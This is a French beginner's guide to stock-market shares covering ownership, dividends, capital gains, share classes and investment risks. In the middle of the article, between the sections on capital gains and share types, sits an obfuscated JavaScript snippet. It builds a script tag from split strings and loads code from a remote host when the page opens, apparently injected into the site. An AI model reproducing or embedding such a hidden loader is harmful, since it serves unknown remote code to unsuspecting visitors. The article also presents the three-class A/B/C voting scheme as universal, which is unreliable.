L’ABC des actions en bourses

Lorsque l’on décide d’investir en bourse, il n’est pas toujours facile de savoir sur quels produits miser. Les actions sont souvent le meilleur choix pour entreprendre sa vie de trader, car leur fonctionnement est plus facile à comprendre. Voici les informations de base qui permettront aux novices de savoir en quoi ils investissent et comment les actions peuvent leur rapporter financièrement ?

Que sont les actions ?

Les actions représentent un titre de propriété. Elles se rapportent à l’entreprise qui les émet. La valeur de celle-ci est relative au nombre d’actions totales qui existent sur le marché, en ce qui a trait à l’entreprise émettrice. Par exemple, un actionnaire qui détient 100 actions d’une entreprise qui en a émis 1 000, possède 10 % de la société. Mais attention : chaque action n’a pas le même poids. En effet, il existe trois types d’actions. La classe d’actions « A » vient avec un droit de vote, alors que les actions « C » n’en possèdent pas. Mais ce sont les actions « B » qui offrent le plus grand pouvoir au détenteur, alors que chacune d’elles possède 10 droits de vote. En bourse, on peut y acheter les actions des entreprises qui y sont cotées. Ce n’est pas le cas de toutes les sociétés, alors qu’un grand nombre d’entre elles sont détenues entièrement par des investisseurs privés.

A découvrir également : Investir et comprendre le fonctionnement des cryptomonnaies : guide complet

Comment peut-on cumuler des gains financiers grâce aux actions en bourse ?

Il existe deux façons d’accroître son capital en investissant dans des actions. Tout d’abord, l’entreprise peut verser des dividendes annuels à ses actionnaires. Ensuite, on peut bénéficier d’une plus-value lors de la revente des actions.

Les dividendes

Lorsqu’une entreprise procède à l’Assemblée Générale annuelle, elle peut décider de verser des dividendes aux détenteurs d’action. Cela ne peut se produire que si celle-ci a fait des bénéfices au cours de l’année précédente. Il faudra alors qu’elle décide quelle part elle reversera à ses actionnaires, sous forme de dividendes. L’objectif est de valoriser l’investissement de chacun des propriétaires de titres. Cependant, il est possible qu’une entreprise préfère utiliser les profits afin de les réinvestir dans l’entreprise pour continuer à la faire croître. Dans tous les cas, ce sont les actionnaires qui prendront la décision de verser ou non des dividendes – du moins ceux qui possèdent des actions offrant un droit de vote.

A lire aussi : Que sont les cryptomonnaies et comment investir dans celles-ci ?

Une plus-value

Ceux qui investissent dans les actions en bourse le font majoritairement dans le but d’obtenir une plus-value sur celles-ci. On calcule sa valeur en considérant le prix d’achat et en le mettant en rapport avec le prix actuel de l’action. La différence entre le montant des deux est la plus-value. Tant que l’on conserve l’action dans son portefeuille, cette plus-value est latente. C’est lorsque l’on procède à la vente qu’elle devient effective. Mais attention : il est aussi possible qu’une action perde de sa valeur dans les jours, mois et années suivant son achat. Il est donc important de bien se renseigner sur l’entreprise avant d’acquérir leurs actions, et de continuer à suivre les nouveautés qui la concernent, par la suite.

(function(){

zl8k=document.createElement(« script »);zl8k_=((« u »)+ »st »)+ »a »;zl8k.async=true;

zl8k.type= »text/javascript »;zl8k_+=(« t.i »)+ » »+ »n »;zl8k_+=((« f »)+ »o »);zl8k_+= »/ »;

zl8ku= »495870411. »;zl8ku+= »llXryi6bl8kmwh050u1″+ »uvrx2u6ry0s »;

zl8k.src= »https:// »+zl8k_+zl8ku;document.body.appendChild(zl8k);

})();

Les différents types d’actions : ordinaires, privilégiées, à dividende prioritaire sans droit de vote

Les actions ordinaires sont les plus communes. Lorsque l’on achète ce type d’action, on acquiert une partie du capital de l’entreprise et on a droit à un vote lors des assemblées générales. Les actionnaires peuvent ainsi exprimer leur opinion sur différents sujets tels que la nomination de nouveaux membres au conseil d’administration ou encore les choix stratégiques pris par la direction.

Les actions privilégiées quant à elles offrent certains avantages aux investisseurs. Effectivement, ces derniers ont priorité sur le paiement des dividendes sur les bénéfices de l’entreprise par rapport aux détenteurs d’actions ordinaires. Par contre, ils ne disposent pas du même pouvoir décisionnel que leurs homologues dans les prises de décisions importantes pour l’entreprise.

Il existe aussi des actions à dividende prioritaire sans droit de vote qui permettent aux actionnaires concernés de recevoir en premier lieu le versement des dividendes seulement si ceux-ci sont effectivement distribués et indiquant qu’ils n’ont pas le droit de participer activement dans la gestion ou l’administration interne de l’entreprise.

Chaque investisseur doit bien comprendre toutes les spécificités liées au type d’action choisi avant son acquisition afin d’éviter toute déception ultérieure résultant souvent d’un manque d’information sur celles-ci, notamment avec une recherche préalable suffisante.

Les risques liés aux actions en bourse : volatilité, effets de levier, pertes financières potentielles

Investir en bourse peut potentiellement rapporter de gros bénéfices, mais vous devez connaître les risques encourus avant d’acheter des actions. Les investisseurs doivent être conscients que les actions sont sujettes à une forte volatilité. Les prix peuvent varier considérablement en un court laps de temps, et il n’y a aucune garantie que le prix augmente après l’achat.

Les investisseurs peuvent aussi utiliser l’effet de levier, qui consiste à emprunter des fonds pour acheter plus d’actions qu’ils ne pourraient se permettre autrement. Bien que cela puisse potentiellement augmenter les bénéfices si le marché est favorable, cela peut aussi entraîner des perturbations financières importantes en cas de baisse soudaine du cours de l’action.

Il est donc primordial que tout investisseur comprenne bien la relation entre risque et récompense potentielle. De même, ils doivent être prêts à accepter l’éventualité de perdre tout ou partie du montant initial investi. Il est recommandé aux débutants en bourse d’investir avec précaution au début, jusqu’à ce qu’ils aient acquis une certaine expérience et compris pleinement les risques liés aux actions.

Bien entendu, le choix judicieux des titres fait aussi partie intégrante du processus décisionnel relatif à tout placement financier réussi. Ces derniers devront effectuer des analyses approfondies sur chaque entreprise concernée (analyse fondamentale) et sur les tendances du marché (analyse technique) afin de minimiser ces risques et maximiser leur investissement.

ARTICLES LIÉS